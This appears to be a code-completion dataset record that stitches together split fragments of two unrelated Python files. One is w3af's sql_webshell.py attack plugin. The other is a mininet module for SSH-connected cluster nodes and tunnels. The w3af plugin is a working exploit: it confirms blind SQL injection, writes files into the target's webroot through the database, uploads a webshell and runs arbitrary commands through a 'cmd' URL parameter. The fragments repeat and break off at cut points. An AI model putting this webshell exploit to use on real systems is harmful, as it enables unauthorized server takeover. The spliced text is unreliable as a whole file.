kb.kb.append( self, 'shell', shell_obj )
return shell_obj
else:
# Sad face :(
return None
def _upload_webshell(self, driver, vuln_obj):
'''
First, upload any file to the target webroot.
Once I've found the target webroot (or any other location inside the webroot where I can
write a file) try to upload a webshell and test for execution.
@parameter driver: The database driver to use in order to upload the file.
@parameter vuln_obj: The vulnerability that we are exploiting.
@return: The webshell URL if the webshell was uploaded, or None if the process failed.
'''
upload_success = False
# First, we test if we can upload a file into a directory we can access:
webroot_dirs = get_webroot_dirs( vuln_obj.getURL().getDomain() )
for webroot in webroot_dirs:
if upload_success: break
# w3af found a lot of directories, and we are going to use that knowledgeBase
# because one of the dirs may be writable and one may not!
for path in self._get_site_directories():
# Create the remote_path
remote_path = webroot + '/' + path
# Create the filename
remote_filename = createRandAlNum( 8 ) + '.' + createRandAlNum(3)
remote_path += '/' + remote_filename
# And just in case... remove double slashes
for i in xrange(3): remote_path = remote_path.replace('//', '/')
# Create the content (which will also act as the test_string)
test_string = content = createRandAlNum(16)
# Create the test URL
test_url = vuln_obj.getURL().urlJoin( path + '/' + remote_filename )
if self._upload_file( driver, remote_path, content, test_url, test_string):
upload_success = True
om.out.console('Successfully wrote a file to the webroot.')
break
# We can upload files, and we know where they are uploaded, now we
# just need to upload a webshell that works in that environment!
if upload_success:
om.out.console('Trying to write a webshell.')
# Get the extension from the vulnerable script
extension = vuln_obj.getURL().getExtension()
for file_content, real_extension in shell_handler.get_webshells( extension ):
# Create the variables to upload the file, based on the success of the
# previous for loop:
remote_path = remote_path[:remote_path.rfind('/')]
filename = createRandAlNum( 8 )
remote_path += '/' + filename + '.' + real_extension
# And now do "the same thing" with the URL
test_url = test_url[:test_url.rfind('/')]
test_url += '/' + filename + '.' + real_extension + '?cmd='
# Upload & test
if self._upload_file( driver, remote_path, file_content, test_url, shell_handler.SHELL_IDENTIFIER):
# Complete success!
om.out.console('Successfully installed a webshell in the target server!')
return test_url
return None
def _upload_file(self, driver, remote_path, content, test_url, test_string):
'''
Uploads a file to the target server, to the remote_path using the given SQL driver.
The content of the file is "content", and check if it was successfully uploaded using a
GET request to test_url and searching for the test_string string.
@return: True if the file was uploaded.
'''
msg = 'Writing "' + content + '" to "' + remote_path +'" and searching it at: "'
msg += test_url +'".'
om.out.debug( msg )
try:
driver.writeFile( remote_path , content )
response = self._urlOpener.GET( test_url )
except Exception, e:
om.out.error('Exception raised while uploading file: "' + str(e) + '".')
return False
else:
if test_string in response.getBody():
return True
else:
return False
def _get_site_directories(self):
'''
@return: A list of the website directories.
'''
url_list = kb.kb.getData('urls','urlList')
url_list = [ i.getPathWithoutFile() for i in url_list ]
url_list = list(set(url_list))
return url_list
def getOptions( self ):
'''
@return: A list of option objects for this plugin.
'''
d1 = 'URL to exploit with fastExploit()'
o1 = option('url', self._url, d1, 'string')
d2 = 'Method to use with fastExploit()'
o2 = option('method', self._method, d2, 'string')
d3 = 'Data to send with fastExploit()'
o3 = option('data', self._data, d3, 'string')
d4 = 'Variable where to inject with fastExploit()'
o4 = option('injvar', self._injvar, d4, 'string')
d5 = 'The algorithm to use in the comparison of true and false response for blind sql.'
h5 = 'The options are: "stringEq" and "setIntersection". Read the user documentation for'
h5 += ' details.'
o5 = option('equAlgorithm', self._equAlgorithm, d5, 'string', help=h5)
d6 = 'Set the equal limit variable'
h6 = 'Two pages are equal if they match in more than equalLimit. Only used when'
h6 += ' equAlgorithm is set to setIntersection.'
o6 = option('equalLimit', self._equalLimit, d6, 'float', help=h6)
d7 = 'Enable or disable the good samaritan module'
h7 = 'The good samaritan module is a the best way to speed up blind sql exploitations.'
h7 += ' It\'s really simple, you see messages in the console that show the status of the'
h7 += ' discovery and you can help the discovery. For example, if you see "Micros" you'
h7 += ' could type "oft", and if it\'s correct, you have made your good action of the day'
h7 += ', speeded up the discovery AND had fun doing it.'
o7 = option('goodSamaritan', self._goodSamaritan, d7, 'boolean', help=h7)
d8 = 'If true, this plugin will try to generate only one shell object.'
o8 = option('generateOnlyOne', self._generateOnlyOne, d8, 'boolean')
ol = optionList()
ol.add(o1)
ol.add(o2)
ol.add(o3)
ol.add(o4)
ol.add(o5)
ol.add(o6)
ol.add(o7)
ol.add(o8)
return ol
def setOptions( self, optionsMap ):
'''
This method sets all the options that are configured using the user interface
generated by the framework using the result of getOptions().
@parameter optionsMap: A map with the options for the plugin.
@return: No value is returned.
'''
self._url = url_object( optionsMap['url'].getValue() ).uri2url()
if optionsMap['method'].getValue() not in ['GET', 'POST']:
raise w3afException('Unknown method.')
else:
self._method = optionsMap['method'].getValue()
self._data = optionsMap['data'].getValue()
self._injvar = optionsMap['injvar'].getValue()
self._equAlgorithm = optionsMap['equAlgorithm'].getValue()
self._equalLimit = optionsMap['equalLimit'].getValue()
self._goodSamaritan = optionsMap['goodSamaritan'].getValue()
self._generateOnlyOne = optionsMap['generateOnlyOne'].getValue()
def getPluginDeps( self ):
'''
@return: A list with the names of the plugins that should be runned before the
current one.
'''
return []
def getRootProbability( self ):
'''
@return: This method returns the probability of getting a root shell using this attack plugin.
This is used by the "exploit *" function to order the plugins and first try to exploit the more critical ones.
This method should return 0 for an exploit that will never return a root shell, and 1 for an exploit that WILL ALWAYS
return a root shell.
'''
return 0.1
def getLongDesc( self ):
'''
@return: A DETAILED description of the plugin functions and features.
'''
return '''
This plugin exploits [blind] sql injections.
The original sql_webshell program was coded by Bernardo Damele and Daniele Bellucci, many thanks to both of
them.
Seven configurable parameters exist:
- url
- method
- data
- injvar
- equAlgorithm
- equalLimit
'''
class sql_web_shell(shell):
def setWebShellURL( self, eu ):
self._webshell_url = eu
def getWebShellURL( self ):
return self._webshell_url
@exec_debug
def execute( self, command ):
|
def end( self ):
om.out.debug('sql_web_shell cleanup complete.')
def getName( self ):
return 'sql_web_shell'
| '''
This method is called when a user writes a command in the shell and hits enter.
Before calling this method, the framework calls the generic_user_input method
from the shell class.
@parameter command: The command to handle ( ie. "read", "exec", etc ).
@return: The result of the command.
'''
to_send = self.getWebShellURL() + urllib.quote_plus( command )
response = self._urlOpener.GET( to_send )
return self._cut(response.getBody()) | identifier_body |
sql_webshell.py | '''
sql_webshell.py
Copyright 2006 Andres Riancho
This file is part of w3af, w3af.sourceforge.net .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
'''
import core.controllers.outputManager as om
import core.data.request.httpPostDataRequest as httpPostDataRequest
import core.data.request.httpQsRequest as httpQsRequest
from core.controllers.basePlugin.baseAttackPlugin import baseAttackPlugin
from core.data.parsers.urlParser import parse_qs, url_object
from core.controllers.w3afException import w3afException
from plugins.attack.db.dbDriverBuilder import dbDriverBuilder as dbDriverBuilder
from core.controllers.sql_tools.blind_sqli_response_diff import blind_sqli_response_diff
from core.controllers.misc.webroot import get_webroot_dirs
from core.data.fuzzer.fuzzer import createRandAlNum
import core.data.kb.knowledgeBase as kb
import core.data.kb.vuln as vuln
from core.data.kb.shell import shell as shell
import plugins.attack.payloads.shell_handler as shell_handler
from plugins.attack.payloads.decorators.exec_decorator import exec_debug
# options
from core.data.options.option import option
from core.data.options.optionList import optionList
import urllib
class sql_webshell(baseAttackPlugin):
'''
Exploits [blind] sql injections by uploading a webshell to the target webroot.
'''
def __init__(self):
baseAttackPlugin.__init__(self)
# Internal variables
self._vuln = None
self._driver = None
# User configured options for fastExploit
self._url = ''
self._method = 'GET'
self._data = ''
self._injvar = ''
# User configured variables
self._equalLimit = 0.9
self._equAlgorithm = 'setIntersection'
self._goodSamaritan = True
self._generateOnlyOne = True
def fastExploit( self ):
'''
Exploits a web app with [blind] sql injections vulns.
The options are configured using the plugin options and setOptions() method.
'''
om.out.debug( 'Starting sql_webshell fastExploit.' )
if self._url is None or self._method is None or self._data is None or self._injvar is None:
raise w3afException('You have to configure the plugin parameters')
else:
freq = None
if self._method == 'POST':
freq = httpPostDataRequest.httpPostDataRequest()
elif self._method == 'GET':
freq = httpQsRequest.httpQsRequest()
else:
raise w3afException('Method not supported.')
freq.setURL( self._url )
freq.setDc( parse_qs( self._data ) )
freq.setHeaders( {} )
bsql = blind_sqli_response_diff()
bsql.setUrlOpener( self._urlOpener )
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
vuln_obj = bsql.is_injectable( freq, self._injvar )
if not vuln_obj:
raise w3afException('Could not verify SQL injection ' + str(vuln) )
else:
om.out.console('SQL injection could be verified, trying to create the DB driver.')
# Try to get a shell using all vuln
msg = 'Trying to exploit using vulnerability with id: ' + str( vuln_obj.getId() )
msg += '. Please wait...'
om.out.console( msg )
shell_obj = self._generateShell( vuln_obj )
if shell_obj is not None:
kb.kb.append( self, 'shell', shell_obj )
return [shell_obj, ] |
raise w3afException('No exploitable vulnerabilities found.')
def getAttackType(self):
'''
@return: The type of exploit, SHELL, PROXY, etc.
'''
return 'shell'
def getExploitableVulns(self):
vulns = kb.kb.getData( 'blindSqli' , 'blindSqli' )
vulns.extend( kb.kb.getData( 'sqli' , 'sqli' ) )
return vulns
def canExploit( self, vulnToExploit=None ):
'''
Searches the kb for vulnerabilities that the plugin can exploit.
@return: True if plugin knows how to exploit a found vuln.
'''
vulns = self.getExploitableVulns()
if vulnToExploit is not None:
vulns = [ v for v in vulns if v.getId() == vulnToExploit ]
if len(vulns) != 0:
return True
else:
om.out.console( 'No [blind] SQL injection vulnerabilities have been found.' )
om.out.console( 'Hint #1: Try to find vulnerabilities using the audit plugins.' )
msg = 'Hint #2: Use the set command to enter the values yourself, and then exploit it using fastExploit.'
om.out.console( msg )
return False
def exploit( self, vulnToExploit=None ):
'''
Exploits a [blind] sql injections vulns that was found and stored in the kb.
@return: True if the shell is working and the user can start calling specific_user_input
'''
if not self.canExploit():
return []
else:
vulns = kb.kb.getData( 'blindSqli' , 'blindSqli' )
vulns.extend( kb.kb.getData( 'sqli' , 'sqli' ) )
bsql = blind_sqli_response_diff()
bsql.setUrlOpener( self._urlOpener )
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
tmp_vuln_list = []
for v in vulns:
# Filter the vuln that was selected by the user
if vulnToExploit is not None:
if vulnToExploit != v.getId():
continue
mutant = v.getMutant()
mutant.setModValue( mutant.getOriginalValue() )
v.setMutant( mutant )
# The user didn't selected anything, or we are in the selected vuln!
om.out.debug('Verifying vulnerability in URL: "' + v.getURL() + '".')
vuln_obj = bsql.is_injectable( v.getMutant().getFuzzableReq(), v.getVar() )
if vuln_obj:
tmp_vuln_list.append( vuln_obj )
# Ok, go to the next stage with the filtered vulnerabilities
vulns = tmp_vuln_list
if len(vulns) == 0:
om.out.debug('is_injectable failed for all vulnerabilities.')
return []
else:
for vuln_obj in vulns:
# Try to get a shell using all vuln
msg = 'Trying to exploit using vulnerability with id: ' + str( vuln_obj.getId() )
msg += '. Please wait...'
om.out.console( msg )
shell_obj = self._generateShell( vuln_obj )
if shell_obj:
if self._generateOnlyOne:
# A shell was generated, I only need one point of exec.
return [shell_obj, ]
else:
# Keep adding all shells to the kb
pass
return kb.kb.getData( self.getName(), 'shell' )
def _generateShell( self, vuln_obj ):
'''
@parameter vuln_obj: The vuln to exploit, as it was saved in the kb or supplied by the user with set commands.
@return: A sql_webshell shell object if sql_webshell could fingerprint the database.
'''
bsql = blind_sqli_response_diff()
bsql.setEqualLimit( self._equalLimit )
bsql.setEquAlgorithm( self._equAlgorithm )
dbBuilder = dbDriverBuilder( self._urlOpener, bsql.equal )
driver = dbBuilder.getDriverForVuln( vuln_obj )
if driver is None:
return None
else:
# We have a driver, now, using this driver, we have to create the webshell in the
# target's webroot!
webshell_url = self._upload_webshell( driver, vuln_obj )
if webshell_url:
# Define the corresponding cut...
response = self._urlOpener.GET( webshell_url )
self._define_exact_cut( response.getBody(), shell_handler.SHELL_IDENTIFIER )
# Create the shell object
# Set shell parameters
shell_obj = sql_web_shell( vuln_obj )
shell_obj.setUrlOpener( self._urlOpener )
shell_obj.setWebShellURL( webshell_url )
shell_obj.set_cut( self._header_length, self._footer_length )
kb.kb.append( self, 'shell', shell_obj )
return shell_obj
else:
# Sad face :(
return None
def _upload_webshell(self, driver, vuln_obj):
'''
First, upload any file to the target webroot.
Once I've found the target webroot (or any other location inside the webroot where I can
write a file) try to upload a webshell and test for execution.
@parameter driver: The database driver to use in order to upload the file.
@parameter vuln_obj: The vulnerability that we are exploiting.
@return: The webshell URL if the webshell was uploaded, or None if the process failed.
'''
upload_success = False
# First, we test if we can upload a file into a directory we can access:
webroot_dirs = get_webroot_dirs( vuln_obj.getURL().getDomain() )
for webroot in webroot_dirs:
if upload_success: break
# w3af found a lot of directories, and we are going to use that knowledgeBase
# because one of the dirs may be writable and one may not!
for path in self._get_site_directories():
# Create the remote_path
remote_path = webroot + '/' + path
# Create the filename
remote_filename = createRandAlNum( 8 ) + '.' + createRandAlNum(3)
remote_path += '/' + remote_filename
# And just in case... remove double slashes
for i in xrange(3): remote_path = remote_path.replace('//', '/')
# Create the content (which will also act as the test_string)
test_string = content = createRandAlNum(16)
# Create the test URL
test_url = vuln_obj.getURL().urlJoin( path + '/' + remote_filename )
if self._upload_file( driver, remote_path, content, test_url, test_string):
upload_success = True
om.out.console('Successfully wrote a file to the webroot.')
break
# We can upload files, and we know where they are uploaded, now we
# just need to upload a webshell that works in that environment!
if upload_success:
om.out.console('Trying to write a webshell.')
# Get the extension from the vulnerable script
extension = vuln_obj.getURL().getExtension()
for file_content, real_extension in shell_handler.get_webshells( extension ):
# Create the variables to upload the file, based on the success of the
# previous for loop:
remote_path = remote_path[:remote_path.rfind('/')]
filename = createRandAlNum( 8 )
remote_path += '/' + filename + '.' + real_extension
# And now do "the same thing" with the URL
test_url = test_url[:test_url.rfind('/')]
test_url += '/' + filename + '.' + real_extension + '?cmd='
# Upload & test
if self._upload_file( driver, remote_path, file_content, test_url, shell_handler.SHELL_IDENTIFIER):
# Complete success!
om.out.console('Successfully installed a webshell in the target server!')
return test_url
return None
def _upload_file(self, driver, remote_path, content, test_url, test_string):
'''
Uploads a file to the target server, to the remote_path using the given SQL driver.
The content of the file is "content", and check if it was successfully uploaded using a
GET request to test_url and searching for the test_string string.
@return: True if the file was uploaded.
'''
msg = 'Writing "' + content + '" to "' + remote_path +'" and searching it at: "'
msg += test_url +'".'
om.out.debug( msg )
try:
driver.writeFile( remote_path , content )
response = self._urlOpener.GET( test_url )
except Exception, e:
om.out.error('Exception raised while uploading file: "' + str(e) + '".')
return False
else:
if test_string in response.getBody():
return True
else:
return False
def _get_site_directories(self):
'''
@return: A list of the website directories.
'''
url_list = kb.kb.getData('urls','urlList')
url_list = [ i.getPathWithoutFile() for i in url_list ]
url_list = list(set(url_list))
return url_list
def getOptions( self ):
'''
@return: A list of option objects for this plugin.
'''
d1 = 'URL to exploit with fastExploit()'
o1 = option('url', self._url, d1, 'string')
d2 = 'Method to use with fastExploit()'
o2 = option('method', self._method, d2, 'string')
d3 = 'Data to send with fastExploit()'
o3 = option('data', self._data, d3, 'string')
d4 = 'Variable where to inject with fastExploit()'
o4 = option('injvar', self._injvar, d4, 'string')
d5 = 'The algorithm to use in the comparison of true and false response for blind sql.'
h5 = 'The options are: "stringEq" and "setIntersection". Read the user documentation for'
h5 += ' details.'
o5 = option('equAlgorithm', self._equAlgorithm, d5, 'string', help=h5)
d6 = 'Set the equal limit variable'
h6 = 'Two pages are equal if they match in more than equalLimit. Only used when'
h6 += ' equAlgorithm is set to setIntersection.'
o6 = option('equalLimit', self._equalLimit, d6, 'float', help=h6)
d7 = 'Enable or disable the good samaritan module'
h7 = 'The good samaritan module is a the best way to speed up blind sql exploitations.'
h7 += ' It\'s really simple, you see messages in the console that show the status of the'
h7 += ' discovery and you can help the discovery. For example, if you see "Micros" you'
h7 += ' could type "oft", and if it\'s correct, you have made your good action of the day'
h7 += ', speeded up the discovery AND had fun doing it.'
o7 = option('goodSamaritan', self._goodSamaritan, d7, 'boolean', help=h7)
d8 = 'If true, this plugin will try to generate only one shell object.'
o8 = option('generateOnlyOne', self._generateOnlyOne, d8, 'boolean')
ol = optionList()
ol.add(o1)
ol.add(o2)
ol.add(o3)
ol.add(o4)
ol.add(o5)
ol.add(o6)
ol.add(o7)
ol.add(o8)
return ol
def setOptions( self, optionsMap ):
'''
This method sets all the options that are configured using the user interface
generated by the framework using the result of getOptions().
@parameter optionsMap: A map with the options for the plugin.
@return: No value is returned.
'''
self._url = url_object( optionsMap['url'].getValue() ).uri2url()
if optionsMap['method'].getValue() not in ['GET', 'POST']:
raise w3afException('Unknown method.')
else:
self._method = optionsMap['method'].getValue()
self._data = optionsMap['data'].getValue()
self._injvar = optionsMap['injvar'].getValue()
self._equAlgorithm = optionsMap['equAlgorithm'].getValue()
self._equalLimit = optionsMap['equalLimit'].getValue()
self._goodSamaritan = optionsMap['goodSamaritan'].getValue()
self._generateOnlyOne = optionsMap['generateOnlyOne'].getValue()
def getPluginDeps( self ):
'''
@return: A list with the names of the plugins that should be runned before the
current one.
'''
return []
def getRootProbability( self ):
'''
@return: This method returns the probability of getting a root shell using this attack plugin.
This is used by the "exploit *" function to order the plugins and first try to exploit the more critical ones.
This method should return 0 for an exploit that will never return a root shell, and 1 for an exploit that WILL ALWAYS
return a root shell.
'''
return 0.1
def getLongDesc( self ):
'''
@return: A DETAILED description of the plugin functions and features.
'''
return '''
This plugin exploits [blind] sql injections.
The original sql_webshell program was coded by Bernardo Damele and Daniele Bellucci, many thanks to both of
them.
Seven configurable parameters exist:
- url
- method
- data
- injvar
- equAlgorithm
- equalLimit
'''
class sql_web_shell(shell):
def setWebShellURL( self, eu ):
self._webshell_url = eu
def getWebShellURL( self ):
return self._webshell_url
@exec_debug
def execute( self, command ):
'''
This method is called when a user writes a command in the shell and hits enter.
Before calling this method, the framework calls the generic_user_input method
from the shell class.
@parameter command: The command to handle ( ie. "read", "exec", etc ).
@return: The result of the command.
'''
to_send = self.getWebShellURL() + urllib.quote_plus( command )
response = self._urlOpener.GET( to_send )
return self._cut(response.getBody())
def end( self ):
om.out.debug('sql_web_shell cleanup complete.')
def getName( self ):
return 'sql_web_shell' | random_line_split | |
remote.py | # code copied from
# https://github.com/mininet/mininet/blob/master/examples/cluster.py
# with some minor changes
from subprocess import PIPE, STDOUT
import os
import re
from itertools import groupby
from operator import attrgetter
from distutils.version import StrictVersion
from mininet.node import Node, OVSSwitch
from mininet.link import Link, TCIntf
from mininet.util import quietRun, decode
from mininet.log import debug, info
from mininet.clean import addCleanupCallback
# pylint: disable=too-many-arguments
def findUser():
"Try to return logged-in (usually non-root) user"
return (
# If we're running sudo
os.environ.get('SUDO_USER', False) or
# Logged-in user (if we have a tty)
(quietRun('who am i').split() or [False])[0] or
# Give up and return effective user
quietRun('whoami').strip())
class ClusterCleanup(object):
"Cleanup callback"
inited = False
serveruser = {}
@classmethod
def add(cls, server, user=''):
"Add an entry to server: user dict"
if not cls.inited:
addCleanupCallback(cls.cleanup)
if not user:
user = findUser()
cls.serveruser[server] = user
@classmethod
def cleanup(cls):
"Clean up"
info('*** Cleaning up cluster\n')
for server, user in cls.serveruser.items():
if server == 'localhost':
# Handled by mininet.clean.cleanup()
continue
else:
cmd = ['su', user, '-c',
'ssh %s@%s sudo mn -c' % (user, server)]
info(cmd, '\n')
info(quietRun(cmd))
# BL note: so little code is required for remote nodes,
# we will probably just want to update the main Node()
# class to enable it for remote access! However, there
# are a large number of potential failure conditions with
# remote nodes which we may want to detect and handle.
# Another interesting point is that we could put everything
# in a mix-in class and easily add cluster mode to 2.0.
class RemoteMixin(object):
"A mix-in class to turn local nodes into remote nodes"
# ssh base command
# -q: don't print stupid diagnostic messages
# BatchMode yes: don't ask for password
# ForwardAgent yes: forward authentication credentials
sshbase = ['ssh', '-q',
'-o', 'BatchMode=yes',
'-o', 'ForwardAgent=yes', '-tt']
def __init__(self, name, server='localhost', user=None, serverIP=None, port=None,
controlPath=False, splitInit=False, **kwargs):
"""Instantiate a remote node
name: name of remote node
server: remote server (optional)
user: user on remote server (optional)
controlPath: specify shared ssh control path (optional)
splitInit: split initialization?
**kwargs: see Node()"""
# We connect to servers by IP address
self.server = server if server else 'localhost'
self.serverIP = (serverIP if serverIP
else self.findServerIP(self.server))
self.user = user if user else findUser()
ClusterCleanup.add(server=server, user=user)
if controlPath is True:
# Set a default control path for shared SSH connections
controlPath = '/tmp/mn-%r@%h:%p'
self.controlPath = controlPath
self.splitInit = splitInit
if self.user and self.server != 'localhost':
self.dest = '%s@%s' % (self.user, self.serverIP)
self.sshcmd = ['sudo', '-E', '-u', "mininet"] + self.sshbase
if port is not None:
self.sshcmd += ["-p", str(port)]
if self.controlPath:
self.sshcmd += ['-o', 'ControlPath=' + self.controlPath,
'-o', 'ControlMaster=auto',
'-o', 'ControlPersist=' + '1']
self.sshcmd += [self.dest]
self.isRemote = True
else:
self.dest = None
self.sshcmd = []
self.isRemote = False
# Satisfy pylint
self.shell, self.pid = None, None
super(RemoteMixin, self).__init__(name, **kwargs)
# Determine IP address of local host
_ipMatchRegex = re.compile(r'\d+\.\d+\.\d+\.\d+')
@classmethod
def findServerIP(cls, server):
"Return our server's IP address"
# First, check for an IP address
ipmatch = cls._ipMatchRegex.findall(server)
if ipmatch:
return ipmatch[0]
# Otherwise, look up remote server
output = quietRun('getent ahostsv4 %s' % server)
ips = cls._ipMatchRegex.findall(output)
ip = ips[0] if ips else None
return ip
# Command support via shell process in namespace
def startShell(self, *args, **kwargs):
"Start a shell process for running commands"
if self.isRemote:
kwargs.update(mnopts='-c')
super(RemoteMixin, self).startShell(*args, **kwargs)
# Optional split initialization
self.sendCmd('echo $$')
if not self.splitInit:
self.finishInit()
def finishInit(self):
"Wait for split initialization to complete"
self.pid = int(self.waitOutput())
def rpopen(self, *cmd, **opts):
"Return a Popen object on underlying server in root namespace"
params = {'stdin': PIPE,
'stdout': PIPE,
'stderr': STDOUT,
'sudo': True}
params.update(opts)
return self._popen(*cmd, **params)
def rcmd(self, *cmd, **opts):
"""rcmd: run a command on underlying server
in root namespace
args: string or list of strings
returns: stdout and stderr"""
popen = self.rpopen(*cmd, **opts)
# info( 'RCMD: POPEN:', popen, '\n' )
# These loops are tricky to get right.
# Once the process exits, we can read
# EOF twice if necessary.
result = ''
while True:
poll = popen.poll()
result += decode(popen.stdout.read())
if poll is not None:
break
return result
@staticmethod
def _ignoreSignal():
"Detach from process group to ignore all signals"
os.setpgrp()
def _popen(self, cmd, sudo=True, tt=True, **params):
"""Spawn a process on a remote node
cmd: remote command to run (list)
**params: parameters to Popen()
returns: Popen() object"""
if isinstance(cmd, str):
cmd = cmd.split()
if self.isRemote:
if sudo:
cmd = ['sudo', '-E'] + cmd
if tt:
cmd = self.sshcmd + cmd
else:
# Hack: remove -tt
sshcmd = list(self.sshcmd)
sshcmd.remove('-tt')
cmd = sshcmd + cmd
else:
if self.user and not sudo:
# Drop privileges
cmd = ['sudo', '-E', '-u', self.user] + cmd
params.update(preexec_fn=self._ignoreSignal)
debug('_popen', cmd, '\n')
popen = super(RemoteMixin, self)._popen(cmd, **params)
return popen
def popen(self, *args, **kwargs):
"Override: disable -tt"
return super(RemoteMixin, self).popen(*args, tt=False, **kwargs)
def addIntf(self, *args, **kwargs):
"Override: use RemoteLink.moveIntf"
# kwargs.update( moveIntfFn=RemoteLink.moveIntf )
# pylint: disable=useless-super-delegation
return super(RemoteMixin, self).addIntf(*args, **kwargs)
class RemoteNode(RemoteMixin, Node):
"A node on a remote server"
pass
class | (RemoteNode):
"A RemoteHost is simply a RemoteNode"
pass
class RemoteOVSSwitch(RemoteMixin, OVSSwitch):
"Remote instance of Open vSwitch"
OVSVersions = {}
def __init__(self, *args, **kwargs):
# No batch startup yet
kwargs.update(batch=True)
super(RemoteOVSSwitch, self).__init__(*args, **kwargs)
def isOldOVS(self):
"Is remote switch using an old OVS version?"
cls = type(self)
if self.server not in cls.OVSVersions:
# pylint: disable=not-callable
vers = self.cmd('ovs-vsctl --version')
# pylint: enable=not-callable
cls.OVSVersions[self.server] = re.findall(
r'\d+\.\d+', vers)[0]
return (StrictVersion(cls.OVSVersions[self.server]) <
StrictVersion('1.10'))
@classmethod
# pylint: disable=arguments-differ
def batchStartup(cls, switches, **_kwargs):
"Start up switches in per-server batches"
key = attrgetter('server')
for server, switchGroup in groupby(sorted(switches, key=key), key):
info('(%s)' % server)
group = tuple(switchGroup)
switch = group[0]
OVSSwitch.batchStartup(group, run=switch.cmd)
return switches
@classmethod
# pylint: disable=arguments-differ
def batchShutdown(cls, switches, **_kwargs):
"Stop switches in per-server batches"
key = attrgetter('server')
for server, switchGroup in groupby(sorted(switches, key=key), key):
info('(%s)' % server)
group = tuple(switchGroup)
switch = group[0]
OVSSwitch.batchShutdown(group, run=switch.rcmd)
return switches
class RemoteLink(Link):
"A RemoteLink is a link between nodes which may be on different servers"
def __init__(self, node1, node2, **kwargs):
"""Initialize a RemoteLink
see Link() for parameters"""
# Create links on remote node
self.node1 = node1
self.node2 = node2
self.tunnel = None
kwargs.setdefault('params1', {})
kwargs.setdefault('params2', {})
kwargs.setdefault('cls1', TCIntf)
kwargs.setdefault('cls2', TCIntf)
self.cmd = None # satisfy pylint
Link.__init__(self, node1, node2, **kwargs)
def stop(self):
"Stop this link"
if self.tunnel:
self.tunnel.terminate()
self.intf1.delete()
self.intf2.delete()
else:
Link.stop(self)
self.tunnel = None
def makeIntfPair(self, intfname1, intfname2, addr1=None, addr2=None,
node1=None, node2=None, deleteIntfs=True):
"""Create pair of interfaces
intfname1: name of interface 1
intfname2: name of interface 2
(override this method [and possibly delete()]
to change link type)"""
node1 = self.node1 if node1 is None else node1
node2 = self.node2 if node2 is None else node2
server1 = getattr(node1, 'server', 'localhost')
server2 = getattr(node2, 'server', 'localhost')
if server1 == server2:
# Link within same server
return Link.makeIntfPair(intfname1, intfname2, addr1, addr2,
node1, node2, deleteIntfs=deleteIntfs)
# Otherwise, make a tunnel
self.tunnel = self.makeTunnel(node1, node2, intfname1, intfname2,
addr1, addr2)
return self.tunnel
@staticmethod
def moveIntf(intf, node):
"""Move remote interface from root ns to node
intf: string, interface
dstNode: destination Node
srcNode: source Node or None (default) for root ns"""
intf = str(intf)
cmd = 'ip link set %s netns %s' % (intf, node.pid)
result = node.rcmd(cmd)
if result:
raise Exception('error executing command %s' % cmd)
return True
def makeTunnel(self, node1, node2, intfname1, intfname2,
addr1=None, addr2=None):
"Make a tunnel across switches on different servers"
# We should never try to create a tunnel to ourselves!
assert node1.server != node2.server
# And we can't ssh into this server remotely as 'localhost',
# so try again swappping node1 and node2
if node2.server == 'localhost':
return self.makeTunnel(node1=node2, node2=node1,
intfname1=intfname2, intfname2=intfname1,
addr1=addr2, addr2=addr1)
debug('\n*** Make SSH tunnel ' + node1.server + ':' + intfname1 +
' == ' + node2.server + ':' + intfname2)
# 1. Create tap interfaces
for node in node1, node2:
# For now we are hard-wiring tap9, which we will rename
cmd = 'ip tuntap add dev tap9 mode tap user ' + node.user
result = node.rcmd(cmd)
if result:
raise Exception('error creating tap9 on %s: %s' %
(node, result))
# 2. Create ssh tunnel between tap interfaces
# -n: close stdin
dest = '%s@%s' % (node2.user, node2.serverIP)
cmd = ['ssh', '-n', '-o', 'Tunnel=Ethernet', '-w', '9:9',
dest, 'echo @']
self.cmd = cmd
tunnel = node1.rpopen(cmd, sudo=False)
# When we receive the character '@', it means that our
# tunnel should be set up
debug('Waiting for tunnel to come up...\n')
ch = decode(tunnel.stdout.read(1))
if ch != '@':
ch += decode(tunnel.stdout.read())
cmd = ' '.join(cmd)
raise Exception('makeTunnel:\n'
'Tunnel setup failed for '
'%s:%s' % (node1, node1.dest) + ' to '
'%s:%s\n' % (node2, node2.dest) +
'command was: %s' % cmd + '\n' +
'result was: ' + ch)
# 3. Move interfaces if necessary
for node in node1, node2:
if not self.moveIntf('tap9', node):
raise Exception('interface move failed on node %s' % node)
# 4. Rename tap interfaces to desired names
for node, intf, addr in ((node1, intfname1, addr1),
(node2, intfname2, addr2)):
if not addr:
result = node.cmd('ip link set tap9 name', intf)
else:
result = node.cmd('ip link set tap9 name', intf,
'address', addr)
if result:
raise Exception('error renaming %s: %s' % (intf, result))
return tunnel
def status(self):
"Detailed representation of link"
if self.tunnel:
if self.tunnel.poll() is not None:
status = "Tunnel EXITED %s" % self.tunnel.returncode
else:
status = "Tunnel Running (%s: %s)" % (
self.tunnel.pid, self.cmd)
else:
status = "OK"
result = "%s %s" % (Link.status(self), status)
return result
class RemoteSSHLink(RemoteLink):
"Remote link using SSH tunnels"
def __init__(self, node1, node2, **kwargs):
RemoteLink.__init__(self, node1, node2, **kwargs)
| RemoteHost | identifier_name |
remote.py | # code copied from
# https://github.com/mininet/mininet/blob/master/examples/cluster.py
# with some minor changes
from subprocess import PIPE, STDOUT
import os
import re
from itertools import groupby
from operator import attrgetter
from distutils.version import StrictVersion
from mininet.node import Node, OVSSwitch
from mininet.link import Link, TCIntf
from mininet.util import quietRun, decode
from mininet.log import debug, info
from mininet.clean import addCleanupCallback
# pylint: disable=too-many-arguments
def findUser():
"Try to return logged-in (usually non-root) user"
return (
# If we're running sudo
os.environ.get('SUDO_USER', False) or
# Logged-in user (if we have a tty)
(quietRun('who am i').split() or [False])[0] or
# Give up and return effective user
quietRun('whoami').strip())
class ClusterCleanup(object):
"Cleanup callback"
inited = False
serveruser = {}
@classmethod
def add(cls, server, user=''):
